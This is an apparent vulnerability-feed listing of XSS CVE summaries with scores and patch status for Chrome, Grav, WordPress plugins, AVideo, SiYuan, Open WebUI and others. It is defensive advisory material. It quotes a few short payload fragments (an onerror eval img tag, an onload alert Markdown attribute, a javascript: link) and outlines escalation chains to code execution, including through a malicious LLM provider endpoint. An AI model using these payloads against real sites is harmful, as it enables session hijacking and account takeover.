CVSS 3.1
5.4
EPSS
0.0%
CVE-2026-7958 MEDIUM PATCH This Month

Uncontrolled XSS vulnerability in Google Chrome's ServiceWorker implementation prior to version 148.0.7778.96 allows attackers to inject arbitrary scripts or HTML into web pages when users install a malicious Chrome extension, bypassing same-origin policy protections. The vulnerability requires user interaction (extension installation) but can be exploited remotely with low attack complexity. CVSS score of 5.4 reflects medium severity; no active exploitation has been publicly reported.

XSS Google Red Hat Suse Chrome
NVD VulDB
CVSS 3.1
5.4
EPSS
0.0%
CVE-2026-7939 MEDIUM PATCH This Month

Google Chrome versions prior to 148.0.7778.96 contain an XSS vulnerability in the SanitizerAPI that allows remote attackers to inject arbitrary scripts or HTML through crafted HTML pages. The vulnerability requires user interaction (visiting a malicious page) but carries medium severity due to its ability to compromise confidentiality and integrity. No public exploit code or active exploitation in CISA KEV has been identified at the time of analysis.

XSS Google Red Hat Suse Chrome
NVD VulDB
CVSS 3.1
5.4
EPSS
0.0%
CVE-2025-31983 LOW Monitor

HCL BigFix Service Management (SM) contains a Content Security Policy (CSP) header misconfiguration that enables cross-site scripting (XSS) attacks. Authenticated users with low privileges can inject malicious scripts by exploiting insufficient CSP directives, potentially exposing sensitive information or hijacking user sessions. The vulnerability requires user interaction (UI:R) and operates in a non-global scope, limiting but not eliminating real-world risk.

XSS Bigfix Service Management Sm
NVD
CVSS 3.1
3.7
EPSS
0.0%
CVE-2025-59854 LOW Monitor

HCL DFXAnalytics relies on the obsolete X-XSS-Protection security header instead of implementing a modern Content Security Policy, allowing attackers with low privileges to potentially exploit browser-specific XSS protections or bypass intended security controls. The vulnerability requires high attack complexity and authenticated access, limiting practical exploitation but indicating security posture degradation in a production analytics platform.

XSS Dfxanalytics
NVD VulDB
CVSS 3.1
3.1
EPSS
0.0%
CVE-2025-31970 MEDIUM This Month

HCL DFXAnalytics fails to enforce strict Content-Security-Policy (CSP) directives for object-src and base-uri, enabling attackers to inject and execute arbitrary scripts through cross-site scripting (XSS) vectors without authentication or user interaction. This network-accessible vulnerability affects all versions and results in information disclosure with a CVSS score of 5.3; no active exploitation has been reported.

XSS Dfxanalytics
NVD VulDB
CVSS 3.1
5.3
EPSS
0.0%
CVE-2026-23928 HIGH PATCH This Week

Stored cross-site scripting (XSS) in Zabbix 6.0-7.4 allows authenticated attackers with high privileges to inject malicious JavaScript via monitored host data that executes when other users view dashboards containing Item history widgets (7.0+) or Plain text widgets (6.0). The attack requires the attacker to control a monitored host and the victim to open a dashboard with HTML display enabled in the affected widget. CVSS 7.3 reflects high impact but requires specific preconditions: high-privilege access (PR:H), user interaction (UI:P), and precise attack timing (AT:P). No CISA KEV listing or public exploit identified at time of analysis, with low immediate exploitation risk given the privilege requirements.

XSS Zabbix Suse
NVD VulDB
CVSS 4.0
7.3
EPSS
0.0%
CVE-2026-23926 HIGH POC PATCH This Week

Stored Cross-Site Scripting (XSS) in Zabbix 7.0.x and 7.4.x allows authenticated administrators with non-super privileges to inject JavaScript payloads into maintenance period configurations. The malicious code executes when any user, including super admins, hovers over the affected maintenance period in the Host navigator widget tooltip, enabling session hijacking, credential theft, or unauthorized administrative actions with the victim's elevated privileges. Attack complexity is low and requires only user interaction (hovering), though exploit execution depends on victim access patterns. No public exploit code or active exploitation confirmed at time of analysis.

XSS Suse
NVD VulDB GitHub
CVSS 4.0
7.3
EPSS
0.0%
CVE-2026-7448 HIGH This Week

Stored Cross-Site Scripting in LatePoint Calendar Booking Plugin for WordPress allows unauthenticated remote attackers to inject malicious JavaScript via the 'first_name' parameter in appointment booking forms, affecting all versions through 5.5.0. The injected scripts persist in the database and execute whenever administrators or other users view booking records, potentially enabling session hijacking, privilege escalation, or further attacks against site administrators. The CVSS vector indicates network-accessible exploitation with no authentication required and changed scope, enabling attacks beyond the vulnerable component. EPSS score not provided; no confirmation of active exploitation (not in CISA KEV) or public exploit code at time of analysis.

XSS WordPress
NVD VulDB
CVSS 3.1
7.2
EPSS
0.1%
CVE-2026-7332 HIGH This Week

Stored cross-site scripting (XSS) in LatePoint WordPress booking plugin (versions ≤5.5.0) allows unauthenticated attackers to inject malicious scripts via the 'booking_form_page_url' parameter that execute when administrators view activity logs. The vulnerability exploits a design flaw where the latepoint_order_intent_created action hook writes unsanitized input to the database before Stripe Connect validation occurs, meaning no functional payment integration is required for exploitation. Wordfence reported this issue with source code references demonstrating the flawed input handling in activities_controller.php and activities_helper.php. CVSS 7.2 with scope change (S:C) reflects potential for attackers to pivot from stored XSS to administrative session hijacking.

XSS WordPress
NVD VulDB
CVSS 3.1
7.2
EPSS
0.2%
CVE-2026-7457 MEDIUM This Month

Stored cross-site scripting in LatePoint calendar booking plugin for WordPress versions up to 5.5.0 allows authenticated customers to inject malicious scripts via unsanitized profile fields (first name, last name, phone, notes) that execute in administrators' browsers when notification templates are previewed. Exploitation requires customer-level access and admin interaction to preview a notification template, but achieves code execution in a high-privilege context (administrator or agent browser session) with scope change from single user to multiple users.

XSS WordPress
NVD VulDB
CVSS 3.1
6.4
EPSS
0.1%
CVE-2026-6672 MEDIUM This Month

Stored Cross-Site Scripting in SliceWP Affiliates plugin for WordPress (versions up to 1.2.7) allows authenticated contributors and above to inject arbitrary JavaScript via unsanitized shortcode attributes in the 'slicewp_affiliate_url' shortcode. The injected scripts execute in the browsers of all users accessing the affected page, enabling account compromise, credential theft, or malware distribution. No public exploit code or active exploitation has been identified, but the vulnerability is straightforward to exploit given the low attack complexity and requires only contributor-level WordPress access.

XSS WordPress
NVD VulDB
CVSS 3.1
6.4
EPSS
0.0%
CVE-2026-42509 Maven MEDIUM PATCH This Month

Cross-site scripting (XSS) vulnerability in Apache Wicket allows unauthenticated remote attackers to inject malicious JavaScript through crafted strings that break out of JavaScript sequence contexts. Affected versions include Wicket 8.0.0-8.17.0, 9.0.0-9.22.0, and 10.0.0-10.8.0. User interaction (e.g., clicking a malicious link) is required for exploitation. EPSS score of 0.03% (8th percentile) indicates low empirical exploitation probability despite network-accessible attack vector.

XSS Apache
NVD VulDB
CVSS 3.1
6.1
EPSS
0.0%
CVE-2026-36358 MEDIUM This Month

Stored cross-site scripting in Juzaweb CMS 5.0.0 allows authenticated remote attackers to inject arbitrary JavaScript via the Add Banner Ads function, exploitable with user interaction (page visit). The vulnerability enables credential theft, session hijacking, and defacement of administrative interfaces. A proof-of-concept is publicly available on GitHub, though exploitation requires authenticated access and victim interaction with a malicious payload.

XSS RCE N A
NVD GitHub
CVSS 3.1
5.4
EPSS
0.0%
CVE-2026-42338 npm MEDIUM PATCH GHSA This Month

Cross-site scripting (XSS) vulnerabilities in ip-address library versions up to 10.1.0 allow attackers to inject arbitrary JavaScript code when untrusted input is passed to Address6.group(), Address6.link(), Address6 constructor (via AddressError.parseMessage), or v6.helpers.spanAll() methods and their output is rendered as HTML. The vulnerability affects four separate code paths that fail to HTML-escape user-controlled content before embedding it in returned HTML strings or error messages. Real-world exposure is extremely limited because security research found zero consumers of these HTML-emitting methods across 425 dependent npm packages and public code repositories; applications using only parsing and comparison APIs are unaffected.

XSS Node.js
NVD GitHub VulDB
CVSS 4.0
5.3
EPSS
0.1%
CVE-2026-42611 PHP HIGH PATCH GHSA This Week

Stored cross-site scripting in Grav CMS allows low-privileged users with page-creation permissions to inject malicious SVG payloads that execute when administrators view the page. The vulnerability stems from regex-based XSS detection that fails to catch unquoted event handlers and omits SVG/MathML from dangerous tags. Exploitation exfiltrates the admin-nonce token from /admin/config/info, enabling CSRF bypass and chained remote code execution through scheduled tasks or plugin endpoints. GitHub advisory GHSA-w8cg-7jcj-4vv2 confirms exploit details; patch available in Grav 2.0.0-beta.2 (commit 5a12f9be8). CVSS 8.9 (High) with network attack vector, low complexity, and scope change reflecting cross-context session hijacking.

PHP CSRF XSS Mozilla RCE
NVD GitHub
CVSS 3.1
8.9
EPSS
0.0%
CVE-2026-42612 PHP HIGH PATCH GHSA This Week

Stored cross-site scripting in Grav CMS allows publisher-level authenticated users to execute arbitrary JavaScript in victim browsers by injecting unquoted HTML event handlers that bypass the detectXss() blacklist regex. The flawed pattern failed to detect on* event attributes without surrounding quotes, enabling payloads like <img src=x onerror=eval(...)> to persist in content fields and execute when administrators or other users view the compromised page. Vendor-released patch confirmed in commit 5a12f9be8 (Grav 2.0.0-beta.2), which tightens the on_events regex to flag unquoted attributes, adds dangerous XML namespace tags (svg, math) to the default blocklist, and hardens MediaObjectTrait::attribute() with strict identifier validation. Publicly available exploit code exists. EPSS and KEV data not provided; exploitation requires publisher-level account privileges.

XSS PHP
NVD GitHub
CVSS 3.1
8.5
EPSS
0.0%
CVE-2026-42842 PHP MEDIUM PATCH GHSA This Month

Stored cross-site scripting in Grav CMS Form plugin allows editor-level users to inject arbitrary JavaScript via taxonomy tag and category values that execute in administrator browsers when viewing any page in the admin panel. The vulnerability exploits unescaped Twig `|raw` filters in the select field template combined with a bypassable XSS detection regex, enabling privilege escalation through nonce theft and unauthorized admin actions. Vendor-released patch available in grav-plugin-form 9.0.1 and Grav core 2.0.0-beta.2.

XSS PHP Privilege Escalation
NVD GitHub
CVSS 3.1
5.4
EPSS
0.0%
CVE-2026-42841 PHP MEDIUM PATCH GHSA This Month

Stored cross-site scripting in Grav CMS via Markdown media attribute injection allows authenticated page editors to inject executable JavaScript event-handler attributes into rendered image HTML. An editor can craft Markdown syntax like `![alt](image.gif?attribute=onload,alert(1))` which bypasses the attribute() media method's input validation and renders as `<img onload="alert(1)">`, executing arbitrary JavaScript in the browsers of any user viewing the affected page, including administrators and reviewers in multi-user installations. Publicly available patch confirmed in version 2.0.0-beta.2.

XSS PHP
NVD GitHub
CVSS 4.0
6.9
EPSS
0.0%
CVE-2026-43939 NuGet HIGH PATCH GHSA This Week

Stored Cross-Site Scripting in YAFNET forum software allows authenticated attackers to inject arbitrary JavaScript into thread posts and replies that automatically executes in the browser of every user who views the affected thread. Affects YAFNET.Core versions ≤3.2.11 and 4.0.0-beta01 through 4.0.4. The payload triggers on page load without victim interaction, enabling session hijacking, credential theft, and account takeover of all viewers including administrators. Vendor-released patches are available (v3.2.12 and v4.0.5). No active exploitation confirmed by CISA KEV, though the attack requires only a standard forum account and proof-of-concept payload is documented in the GitHub advisory.

XSS
NVD GitHub
CVSS 3.1
7.3
EPSS
0.0%
CVE-2026-43938 NuGet HIGH PATCH GHSA This Week

Remote unauthenticated attackers can execute JavaScript in administrator sessions of YAF.NET forum software (versions ≤3.2.11 and 4.0.0-beta01 through 4.0.4) by injecting malicious User-Agent headers via any endpoint that triggers exception logging, notably /api/Attachments/GetAttachment. The stored XSS payload fires when administrators view the Event Log admin panel, enabling full forum takeover through admin-session hijacking. A working proof-of-concept exists requiring only a single anonymous HTTP request. EPSS and KEV data not available; CVSS 8.1 (High) reflects network vector, low complexity, and no authentication requirement, though the UI:R metric indicates the admin must visit the log page for execution.

XSS CSRF
NVD GitHub
CVSS 3.1
8.1
EPSS
0.0%
CVE-2026-42554 Go MEDIUM PATCH GHSA This Month

Reflected cross-site scripting in Go Fiber's AutoFormat() method allows remote attackers to inject arbitrary HTML and JavaScript by sending Accept: text/html headers with attacker-controlled data passed to AutoFormat(). The vulnerability affects Fiber v3 through 3.1.0 and v2 through 2.52.12, where the HTML output branch concatenates user data directly into markup without escaping, while all other format branches (JSON, XML, MsgPack, CBOR) properly sanitize output. A proof-of-concept demonstrates script injection via query parameters when HTML content negotiation is selected by an attacker.

XSS
NVD GitHub VulDB
CVSS 4.0
5.3
EPSS
0.2%
CVE-2026-43878 PHP MEDIUM PATCH GHSA This Month

Reflected XSS in AVideo's Meet plugin allows unauthenticated attackers to execute arbitrary JavaScript in a victim's browser by injecting unescaped user and pass query parameters into a JavaScript string literal. The vulnerability is reachable without authentication on any public Meet schedule with no password (the default configuration), enabling session cookie theft and account takeover of authenticated users. CVSS 6.1 (AV:N/AC:L/PR:N/UI:R/S:C) reflects network delivery requiring user interaction but changed scope due to cookie exfiltration across the AVideo application origin.

XSS PHP CSRF
NVD GitHub
CVSS 3.1
6.1
EPSS
0.0%
CVE-2026-43876 PHP MEDIUM PATCH GHSA This Month

Stored HTML injection in AVideo's notifySubscribers endpoint allows any authenticated uploader to broadcast platform-branded phishing emails to up to 10,000 channel subscribers without sanitization, escaping, or rate limits. The attacker-supplied HTML is injected directly into the email template via str_replace and rendered by PHPMailer, arriving with the platform's official contact email address, logo, and site title, enabling credential theft and reconnaissance at scale with no visible indication that content originated from an uploader rather than the platform operator.

Canonical XSS PHP CSRF
NVD GitHub
CVSS 3.1
6.4
EPSS
0.0%
CVE-2026-43874 PHP HIGH PATCH GHSA This Week

Unauthenticated remote code execution in AVideo ≤29.0 allows attackers to inject and execute arbitrary JavaScript in the browsers of any logged-in users through a WebSocket message relay bypass. An attacker obtains a WebSocket token without authentication from plugin/YPTSocket/getWebSocket.json.php, connects to the WebSocket server, and sends a crafted message with autoEvalCodeOnHTML nested under the json field instead of msg. The incomplete server-side sanitization from prior fix c08694bf6 (GHSA-gph2-j4c9-vhhr) only strips autoEvalCodeOnHTML from $json['msg'], but the relay function msgToResourceId() preferentially selects $msg['json'] as the outbound message carrier. The payload bypasses sanitization, reaches the victim's browser via WebSocket relay, and executes through eval() at plugin/YPTSocket/script.js:573-575. Vendor-released patch: commit 9f3006f9a (recursive stripping across all message carriers). No public exploit identified at time of analysis, but the advisory includes functional proof-of-concept Python code.

PHP CSRF Python XSS RCE +2
NVD GitHub
CVSS 3.1
7.2
EPSS
0.1%
CVE-2026-42874 PyPI LOW PATCH Monitor

HTTP response splitting in Microdot's Response.set_cookie() method allows header injection attacks when an attacker-controlled XSS payload reaches the server and is stored as a cookie value. The vulnerability stems from unsanitized carriage return and linefeed characters (\r\n) in cookie parameters, enabling an attacker to inject arbitrary HTTP headers. Exploitation requires prior client-side compromise (XSS), limiting the attack to a single compromised client per incident.

XSS
NVD GitHub
CVSS 3.1
3.7
EPSS
0.0%
CVE-2026-42045 npm MEDIUM This Month

Stored XSS in LobeChat's message rendering escalates to remote code execution via exposed Electron IPC when victims configure an attacker-controlled LLM provider endpoint. The vulnerability chains unfiltered HTML rendering with an unauthenticated shellCommand IPC handler that executes arbitrary system commands at user privilege level. Confirmed in versions up to 2.1.26; patch released in v2.1.48. Public proof-of-concept demonstrates opening arbitrary applications via malicious LLM API responses.

Python Command Injection XSS RCE
NVD GitHub
CVSS 3.1
6.2
EPSS
0.0%
CVE-2026-27694 MEDIUM PATCH This Month

Stored cross-site scripting (XSS) in Traccar 6.11.1 through 6.12.x allows low-privilege authenticated users to inject malicious HTML into device, geofence, and driver name fields, which is then rendered unescaped in email notification templates sent to other users. This enables phishing attacks or spoofed email content delivered via the application's notification system. The vulnerability is fixed in version 6.13.0.

XSS Traccar
NVD GitHub
CVSS 3.1
5.4
EPSS
0.0%
CVE-2023-54349 MEDIUM POC This Month

AmazCart CMS 3.4 contains a reflected cross-site scripting vulnerability that allows unauthenticated attackers to inject malicious scripts by submitting payloads through the search functionality. Rated medium severity (CVSS 5.1), this vulnerability is remotely exploitable, no authentication required, low attack complexity. Public exploit code available and no vendor patch available.

XSS Amazcart Cms
NVD Exploit-DB
CVSS 4.0
5.1
EPSS
0.1%
CVE-2026-5159 MEDIUM This Month

Stored Cross-Site Scripting in Royal Addons for Elementor's Instagram Feed widget allows authenticated contributors and above to inject arbitrary JavaScript via the 'instagram_follow_text' setting, which executes in the browsers of all users viewing the affected page. The vulnerability affects all versions up to 1.7.1056 and requires the Instagram Feed widget to be previously configured with a valid access token by an administrator. No public exploit code or active exploitation has been confirmed at this time.

XSS WordPress Elementor
NVD VulDB
CVSS 3.1
6.4
EPSS
0.0%
CVE-2026-4665 MEDIUM This Month

Stored Cross-Site Scripting in WP Carousel Free plugin for WordPress affects all versions up to 2.7.10, allowing authenticated attackers with Contributor-level access to inject arbitrary JavaScript via malformed carousel container IDs in the fancybox `data-caption` attribute. The vulnerability arises when the fancybox configuration script fails to initialize due to unsanitized DOM selectors, causing the bundled fancybox library v3.5.7 to fall back to unsafe default caption handling that renders HTML directly. This enables script execution in the context of site visitors clicking images in the compromised carousel lightbox. No public exploit code or active exploitation has been confirmed at the time of analysis.

XSS WordPress
NVD VulDB
CVSS 3.1
6.4
EPSS
0.0%
CVE-2026-4803 HIGH This Week

Stored Cross-Site Scripting in Royal Elementor Addons WordPress plugin allows unauthenticated remote attackers to inject malicious scripts that execute in victim browsers. The vulnerability exists in all versions up to 1.7.1056 due to a publicly leaked static nonce that bypasses authentication checks for the wpr_update_form_action_meta AJAX endpoint. Combined with insufficient input sanitization on the 'status' parameter, attackers can inject persistent XSS payloads without authentication. EPSS data not provided; no CISA KEV listing indicates no confirmed widespread exploitation at time of analysis.

XSS WordPress Elementor
NVD VulDB
CVSS 3.1
7.2
EPSS
0.1%
CVE-2026-5505 MEDIUM This Month

Stored Cross-Site Scripting in WP-Clippy plugin for WordPress up to version 1.0.0 allows authenticated attackers with contributor-level access or higher to inject arbitrary JavaScript via the `clippy` shortcode due to insufficient input sanitization and output escaping. Injected scripts execute in the context of any user viewing the affected page. No public exploit code or active exploitation has been identified at the time of analysis.

XSS WordPress
NVD VulDB
CVSS 3.1
6.4
EPSS
0.0%
CVE-2026-6255 MEDIUM This Month

Stored cross-site scripting in Simple Owl Shortcodes WordPress plugin versions up to 2.1.1 allows authenticated contributors and above to inject arbitrary JavaScript via the 'num' attribute of the 'owls_wrapper' shortcode due to insufficient input sanitization and output escaping. Injected scripts execute in the context of any user viewing the affected page, enabling session hijacking, credential theft, or malware distribution. No public exploit code or active exploitation has been confirmed at the time of analysis.

XSS WordPress
NVD VulDB
CVSS 3.1
6.4
EPSS
0.0%
CVE-2026-6704 MEDIUM This Month

Reflected Cross-Site Scripting in Blog Settings plugin for WordPress versions up to 1.0 allows unauthenticated attackers to inject arbitrary JavaScript via the 'page' parameter due to insufficient input sanitization and output escaping. An attacker must trick a user into clicking a malicious link to execute the injected script in the victim's browser session, potentially compromising WordPress admin credentials or site functionality.

XSS WordPress
NVD VulDB
CVSS 3.1
6.1
EPSS
0.1%
CVE-2026-2868 MEDIUM This Month

Stored Cross-Site Scripting in Gutenverse - Ultimate WordPress FSE Blocks Addons & Ecosystem plugin up to version 3.5.3 allows authenticated attackers with contributor-level access to inject arbitrary JavaScript into pages via the 'separatorIconSVG' parameter, executing malicious scripts whenever users view affected pages. The vulnerability stems from insufficient input sanitization and output escaping. No public exploit code or active exploitation has been identified at the time of analysis.

XSS WordPress
NVD
CVSS 3.1
6.4
EPSS
0.0%
CVE-2026-5247 MEDIUM This Month

Stored cross-site scripting (XSS) in PublishPress Future WordPress plugin versions up to 4.10.0 allows authenticated administrators to inject arbitrary JavaScript via the 'wrapper' attribute of the [futureaction] shortcode, which executes in the browsers of all users viewing the affected page. The vulnerability stems from insufficient sanitization: the plugin uses esc_html() to escape the attribute value but then passes it as a bare HTML tag name in a sprintf() call, permitting event handler injection through spaces. Since administrators can delegate this functionality to lower-privileged contributors, the attack surface extends beyond high-privilege users.

XSS WordPress
NVD GitHub
CVSS 3.1
5.5
EPSS
0.0%
EPSS 0% CVSS 5.4
MEDIUM PATCH This Month

Plunk is an open-source email platform built on top of AWS SES. Prior to version 0.9.0, a stored cross-site scripting (XSS) vulnerability exists in the campaign management feature, where the email body content created by authenticated project members is stored and later rendered in the admin dashboard using React's dangerouslySetInnerHTML without any HTML sanitization. This allows a lower-privileged member to embed malicious scripts in a campaign's email body that execute in the context of any admin or other member who views the campaign, potentially enabling session hijacking or unauthorized actions on their behalf. This issue has been patched in version 0.9.0.

XSS Plunk
NVD GitHub
EPSS 0% CVSS 6.2
MEDIUM PATCH This Month

Stored cross-site scripting in Grav admin panel allows authenticated attackers to inject malicious JavaScript into page titles via the data[header][title] parameter, which is then executed when other administrators access the affected page or its move function. The vulnerability requires admin authentication to inject the payload but affects all subsequent viewers, enabling session hijacking, credential theft, and administrative impersonation. Publicly available exploit code exists with working proof-of-concept screenshots.

XSS RCE
NVD GitHub
EPSS 0% CVSS 9.4
CRITICAL PATCH Act Now

Remote code execution in SiYuan's Electron renderer occurs when users hover over search results, file tree items, or attribute view elements containing URL-encoded XSS payloads in document titles or metadata. The vulnerability chains a URL-decoding step (decodeURIComponent) with unsafe innerHTML assignment in tooltip rendering, bypassing the escapeAriaLabel sanitizer that only handles HTML entities but ignores %XX URL escapes. Because SiYuan's renderer runs with nodeIntegration:true and contextIsolation:false, the XSS escalates to arbitrary code execution via require('child_process'). Exploitation requires user interaction (hovering) but no authentication, and malicious payloads survive .sy.zip export/import and sync replication, enabling supply-chain and shared-workspace attacks. No public exploit code identified at time of analysis, though detailed proof-of-concept is published in the GitHub advisory.

Microsoft XSS Python +4
NVD GitHub VulDB
EPSS 0% CVSS 7.3
HIGH PATCH This Week

Stored cross-site scripting in Open WebUI versions 0.3.5 through 0.8.12 allows authenticated users with model creation permission to inject malicious JavaScript via markdown-link payloads in model descriptions. Attackers craft markdown links with javascript: URIs (e.g., [text](javascript:alert())) that bypass sanitization, are parsed into executable anchor tags by marked.parse(), and rendered unsafely via Svelte's {@html} directive. Successful exploitation enables session token theft from localStorage and full account takeover of admins and other users who view the malicious model in the chat UI. This represents a pipeline-ordering flaw distinct from CVE-2024-7990, which exploited a video-tag restoration logic removed in v0.4.0. Fix confirmed in v0.9.0 (commit 5eab125) via DOMPurify post-processing. EPSS data not provided; CVSS 7.3 reflects network attack vector with low complexity but required authentication and user interaction, limiting automated exploitation.

XSS RCE Python
NVD GitHub VulDB
EPSS 0% CVSS 5.1
MEDIUM PATCH This Month

Stored cross-site scripting in MCP Registry's catalogue UI allows any user with a publish token to inject arbitrary event handlers via the `websiteUrl` field by breaking out of an `href` attribute with an unescaped double-quote character. The server-side URL validator accepts quotes and the client-side `escapeHtml` helper fails to encode them in attribute context, enabling attackers to execute JavaScript on the registry.modelcontextprotocol.io origin with access to localStorage, XHR, and auth tokens. Vendor-released patch version 1.7.7 available; actively confirmed via proof-of-concept.

Canonical XSS Microsoft
NVD GitHub VulDB
EPSS 0% CVSS 9.3
CRITICAL PATCH Act Now

Stored XSS in PrestaShop back-office Customer Service enables unauthenticated attackers to achieve full back-office takeover via malicious Contact Us form submissions. The vulnerability affects PrestaShop versions prior to 8.2.6 and 9.0.0-9.1.0, with patches released in versions 8.2.6 and 9.1.1. Despite the 9.3 CVSS score reflecting critical severity due to network attack vector, low complexity, and scope change, the CVSS UI:R requirement (user interaction) means exploitation requires a back-office employee to open the malicious customer thread. No public exploit code has been identified at time of analysis, and the vulnerability is not listed in CISA KEV, indicating no confirmed widespread active exploitation despite the critical impact potential.

XSS Microsoft
NVD GitHub
EPSS 0% CVSS 9.4
CRITICAL PATCH Act Now

Remote code execution in SiYuan's Electron desktop application allows authenticated attackers (or browser extensions on localhost) to inject malicious JavaScript through unescaped Attribute View names, escalating from stored XSS to arbitrary system command execution. The Go kernel backend stores AV names without HTML escaping, then embeds them via string replacement into HTML templates pushed over WebSocket. Three TypeScript renderer paths (render.ts, Title.ts, transaction.ts) consume this data using innerHTML/outerHTML without sanitization. Because the Electron main window runs with nodeIntegration:true and contextIsolation:false, script injection grants full Node.js API access—enabling attackers to spawn child processes (calc.exe/xcalc demonstrated in PoC), exfiltrate SSH keys, install backdoors, or pivot to cloud credentials. Payloads persist in JSON files under data/storage/av/, replicate across all sync transports (S3/WebDAV/cloud), survive .sy.zip export-import, and trigger for any user role (Administrator/Editor/Reader/Visitor) opening a document bound to the poisoned database view. CVSS 9.4 (Network/Low/None/High Confidentiality-Integrity-Availability + Scope Changed) reflects worst-case remote network vector, though the primary realistic attack path is via installed browser extensions (chrome-extension:// Origin explicitly allowlisted in session.go:277) calling the /api/transactions endpoint as an auto-granted admin on default installations with no Access Authorization Code. GitHub advisory GHSA-2h64-c999-c9r6 confirms patch available in kernel commit 0.0.0-20260512140701-d7b77d945e0d. No public exploit code identified at time of analysis, but detailed reproduction steps with curl payloads and Electron DevTools inspection are published in the advisory.

Microsoft Node.js XSS +4
NVD GitHub
EPSS 0% CVSS 6.1
MEDIUM PATCH This Month

Reflected XSS in MapServer 6.0 through 8.6.1 allows unauthenticated remote attackers to inject arbitrary HTML and JavaScript into the browsers of users clicking crafted WMS URLs. The vulnerability exists in the OpenLayers template when FORMAT=application/openlayers is combined with an unsanitized SRS parameter in WMS 1.3.0 requests. MapServer 8.6.2 patches this issue, and no public exploit code or active exploitation has been confirmed, though the attack requires user interaction (clicking a malicious link).

XSS Mapserver
NVD GitHub VulDB
EPSS 0% CVSS 7.5
HIGH PATCH This Week

Cross-origin DOM XSS and handler hijacking in the locize client SDK (browser module) allows remote attackers to execute arbitrary JavaScript, steal translation content, and manipulate the InContext editor UI. Attackers exploit missing postMessage origin validation by crafting messages from any embedded iframe, opened window, or parent frame that shares a window reference with a locize-enabled page. The vulnerability affects all versions prior to 4.0.21, with the vendor confirming exploitation through multiple handler paths (editKey, commitKeys, isLocizeEnabled, requestPopupChanges). No public exploit identified at time of analysis, though the GitHub security advisory provides detailed exploitation vectors including innerHTML injection, attribute-based XSS (onclick, href="javascript:"), and API endpoint hijacking to intercept translation data.

XSS Locize
NVD GitHub
EPSS 0% CVSS 2.3
LOW PATCH Monitor

Reflected cross-site scripting (XSS) in absinthe_plug GraphiQL interface allows unauthenticated attackers to execute arbitrary JavaScript in victims' browsers via the query GET parameter. The vulnerability exploits incomplete input escaping in the js_escape/1 function, which fails to escape backslashes before embedding user-controlled query strings into inline JavaScript. An attacker can bypass existing single-quote and newline escaping by prefixing a quote with a backslash (e.g., \'), breaking out of the string context. Vendor-released patch available (version 1.10.2 and later); exploitation requires user interaction (clicking a malicious link).

XSS Absinthe Plug
NVD GitHub VulDB
EPSS 0% CVSS 7.1
HIGH PATCH This Week

HTML injection in Brave CMS 2.0 contact form allows remote attackers to inject arbitrary HTML markup into administrative notification emails. The unauthenticated contact form passes user-supplied message text through nl2br() without HTML escaping, then renders it using Blade's unescaped {!! $msg !!} directive. While JavaScript execution is blocked by modern email clients, attackers can craft convincing phishing interfaces within the email body to target administrators. Upstream fix available via commit 6c56603, which implements HTML escaping using Laravel's e() helper function. EPSS and KEV data not provided. GitHub source diff confirms the vulnerability in ContactController.php and documents the server-side sanitization fix.

XSS Microsoft
NVD GitHub
EPSS 0% CVSS 6.1
MEDIUM PATCH This Month

DOM-based cross-site scripting (XSS) in th30d4y/IP versions 1.0.1 through 2.0.0 allows remote attackers to execute arbitrary JavaScript in a victim's browser by crafting malicious input to the IP Reputation Checker application. The vulnerability requires user interaction (clicking a malicious link) but affects all users of vulnerable versions. Vendor-released patch: version 2.0.1.

XSS W4Nn4D13 Ip
NVD GitHub
EPSS 0% CVSS 8.7
HIGH PATCH This Week

Stored cross-site scripting (XSS) in Brave CMS 2.0 allows authenticated users with editor privileges to inject malicious JavaScript through the CKEditor rich-text interface, achieving persistent code execution in all visitors' browsers. The vulnerability stems from Laravel Blade's unescaped output directive {!! !!} rendering user-supplied content without sanitization. Patched via commit 6c56603 which implements HtmlSanitizer to allowlist safe HTML tags and strip dangerous attributes before database storage.

XSS
NVD GitHub
EPSS 0% CVSS 6.4
MEDIUM This Month

Stored cross-site scripting in Sky Addons plugin for WordPress (versions up to 3.3.2) allows authenticated attackers with Author-level access to inject arbitrary JavaScript via the REST API that persists in the `sky-custom-scripts` post type and executes on all frontend pages for every site visitor. The vulnerability stems from insufficient input sanitization on the `sky_script_content` meta field combined with lack of output escaping during frontend rendering. No public exploit code or active exploitation has been identified at time of analysis, but the attack requires only Author-level privileges and standard REST API access, making it a practical threat in multi-user WordPress environments.

XSS WordPress Elementor
NVD
EPSS 0% CVSS 6.4
MEDIUM This Month

Stored Cross-Site Scripting (XSS) in the NMR Strava Activities WordPress plugin through version 1.0.14 allows authenticated contributors and above to inject arbitrary JavaScript into pages via the `strava_nmr_connect` shortcode due to insufficient input sanitization and output escaping. The injected scripts execute in the context of any user viewing the affected page, compromising session security and enabling account takeover or malware distribution. A vendor patch addressing the vulnerability is available in version 1.0.15.

XSS WordPress
NVD
EPSS 0% CVSS 6.4
MEDIUM This Month

Stored Cross-Site Scripting in E2Pdf - Export Pdf Tool for WordPress plugin versions up to 1.32.17 allows authenticated attackers with Contributor-level access to inject arbitrary JavaScript via the 'id' attribute of the e2pdf-download shortcode, which executes when any user views the affected page. The vulnerability stems from insufficient input sanitization and output escaping on shortcode attributes, enabling persistent script injection with moderate confidentiality and integrity impact across site scopes.

XSS WordPress
NVD
EPSS 0% CVSS 7.2
HIGH This Week

Stored Cross-Site Scripting in Auto Affiliate Links for WordPress allows unauthenticated remote attackers to inject malicious JavaScript into administrator statistics pages through an unprotected AJAX endpoint. The vulnerability stems from missing input sanitization on the 'url' parameter in aal_url_stats_save_action() combined with direct output of stored values in aal_display_clicks() without escaping. Attackers can exploit a publicly exposed nonce and the wp_ajax_nopriv_ hook to store malicious payloads that execute when administrators view click statistics, potentially leading to session hijacking, privilege escalation, or site compromise. Wordfence reported this vulnerability affecting versions through 6.8.8, with a patch released in version 6.8.8.1.

XSS WordPress
NVD VulDB
EPSS 0% CVSS 1.9
LOW POC Monitor

Cross-site scripting (XSS) in SourceCodester Pharmacy Sales and Inventory System 1.0 allows high-privileged users with user interaction to inject malicious scripts via the Name parameter in /index.php?page=users, affecting application integrity with low severity. The vulnerability requires administrative privileges and user interaction to exploit, limiting real-world impact despite public exploit availability.

XSS PHP
NVD VulDB GitHub
EPSS 0% CVSS 5.1
MEDIUM PATCH This Month

